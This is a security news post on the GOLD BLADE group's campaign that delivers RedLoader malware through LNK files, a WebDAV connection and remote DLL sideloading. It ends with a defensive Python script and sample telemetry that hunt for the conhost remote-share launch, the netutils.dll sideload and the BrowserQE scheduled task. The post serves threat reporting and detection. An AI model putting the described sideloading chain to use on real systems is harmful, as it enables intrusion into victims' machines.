Threat Actors Weaponizes LNK Files to Deploy RedLoader Malware on Windows Systems

Posted on July 31, 2025 By CWS

The cybersecurity landscape faces a renewed threat as the GOLD BLADE cybercriminal group has significantly evolved its attack methodology, combining previously observed techniques to create a sophisticated infection chain.

This new campaign, which surged in July 2025, leverages malicious LNK files paired with a recycled WebDAV technique to deploy the group's custom RedLoader malware on Windows systems.

The threat represents a concerning escalation in the group's capabilities, demonstrating how established threat actors continually adapt their tactics to evade detection and maximize infection success rates.

The attack begins with a deceptively simple social engineering technique, in which threat actors distribute well-crafted cover letter PDFs through legitimate third-party job sites such as Indeed.com.

These documents contain malicious links that automatically download ZIP archives to victims' systems, initiating a complex multi-stage infection process.

The observed RedLoader execution chain (Source – Sophos)

The sophistication lies not in the initial delivery mechanism but in the subsequent execution chain, which combines legitimate system processes with malicious payloads to establish persistent access while remaining largely undetected by traditional security measures.

Sophos analysts identified this new infection chain while investigating the GOLD BLADE group's evolving tactics, noting that while the individual components had been observed separately in earlier campaigns, their combination represents an unprecedented approach to initial system compromise.

The researchers observed that the group previously used WebDAV techniques for remote DLL execution in September 2024 and DLL sideloading techniques in March 2025, but the July 2025 campaign marks the first documented instance of these techniques being orchestrated together.

Remote DLL Sideloading: A Technical Deep Dive

The most technically sophisticated aspect of this campaign involves the remote DLL sideloading mechanism that serves as the foundation for RedLoader deployment.

Once the LNK file executes, it triggers conhost.exe to establish a WebDAV connection to the Cloudflare-hosted domain automatinghrservices[.]workers[.]dev.

The malicious infrastructure hosts a renamed copy of Adobe's legitimate ADNotificationManager.exe executable, which masquerades as a resume document to maintain the social engineering pretense.

The critical technical innovation lies in the remote sideloading process, where the legitimate executable automatically loads the malicious netutils.dll file from the same remote directory.

This technique means a legitimately signed executable loads malicious code without triggering typical security alerts.

RedLoader stage 1 then establishes persistence through a scheduled task named BrowserQEBrowserQE_, demonstrating the malware's capability to create victim-specific identifiers while maintaining consistent operational signatures across different compromised systems.
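The execution chain above leaves three telemetry artifacts a defender can hunt for: conhost.exe reaching a WebDAV/UNC path on a workers.dev host, a DLL named netutils.dll loaded from somewhere other than the Windows system directories, and a scheduled task whose name starts with the observed BrowserQE prefix. The following Python is an added example, not Sophos's or the blog's code; the event schema is a constructed Sysmon-like one, the host name is a placeholder, and treating the task name as a prefix is an assumption based on the article's note that identifiers are victim-specific.

```python
import re

# UNC path of the form \\host[@SSL[@443]]\share\..., which is how Windows exposes WebDAV shares.
UNC_PATH = re.compile(r"\\\\[\w.\-]+(?:@ssl)?(?:@\d+)?\\", re.IGNORECASE)
WORKERS_DEV_HOST = re.compile(r"\\\\[\w.\-]+\.workers\.dev", re.IGNORECASE)
SYSTEM_DLL_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Assumption: match the observed task name as a prefix, since the article says the
# malware generates victim-specific identifiers.
TASK_NAME = re.compile(r"^\\?BrowserQE", re.IGNORECASE)


def check_event(ev: dict) -> list[str]:
    """Return the names of the detection rules that fire on one event."""
    hits = []
    if ev["type"] == "ProcessCreate":
        image, cmd = ev["Image"], ev.get("CommandLine", "")
        # conhost.exe launched with a remote UNC / WebDAV target (the LNK stage)
        if image.lower().endswith("\\conhost.exe") and (UNC_PATH.search(cmd) or WORKERS_DEV_HOST.search(cmd)):
            hits.append("conhost_remote_unc_launch")
        # an executable whose own image lives on a remote share (the renamed Adobe binary)
        if UNC_PATH.match(image):
            hits.append("exe_running_from_remote_share")
    elif ev["type"] == "ImageLoad":
        dll = ev["ImageLoaded"].lower()
        # netutils.dll ships in System32; a copy loaded from anywhere else is the sideload
        if dll.endswith("\\netutils.dll") and not dll.startswith(SYSTEM_DLL_DIRS):
            hits.append("netutils_dll_sideload")
    elif ev["type"] == "TaskCreate" and TASK_NAME.match(ev["TaskName"]):
        hits.append("redloader_task_name")
    return hits


def scan(events: list[dict]) -> list[tuple[int, str]]:
    """Run all events through the rules; return (event index, rule name) pairs."""
    return [(i, rule) for i, ev in enumerate(events) for rule in check_event(ev)]


# Constructed sample telemetry; "hr-lure-placeholder.workers.dev" is a placeholder host.
SAMPLE_EVENTS = [
    {"type": "ProcessCreate", "Image": "C:\\Windows\\System32\\conhost.exe",
     "CommandLine": "conhost.exe \\\\hr-lure-placeholder.workers.dev@SSL\\DavWWWRoot\\Resume.exe"},
    {"type": "ProcessCreate", "Image": "\\\\hr-lure-placeholder.workers.dev@SSL\\DavWWWRoot\\Resume.exe",
     "CommandLine": "Resume.exe"},
    {"type": "ImageLoad", "Image": "\\\\hr-lure-placeholder.workers.dev@SSL\\DavWWWRoot\\Resume.exe",
     "ImageLoaded": "\\\\hr-lure-placeholder.workers.dev@SSL\\DavWWWRoot\\netutils.dll"},
    {"type": "ImageLoad", "Image": "C:\\Windows\\explorer.exe",
     "ImageLoaded": "C:\\Windows\\System32\\netutils.dll"},  # benign: the system copy
    {"type": "TaskCreate", "TaskName": "\\BrowserQEBrowserQE_a1b2c3"},
    {"type": "TaskCreate", "TaskName": "\\Microsoft\\Windows\\UpdateOrchestrator\\Schedule Scan"},  # benign
]

if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```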
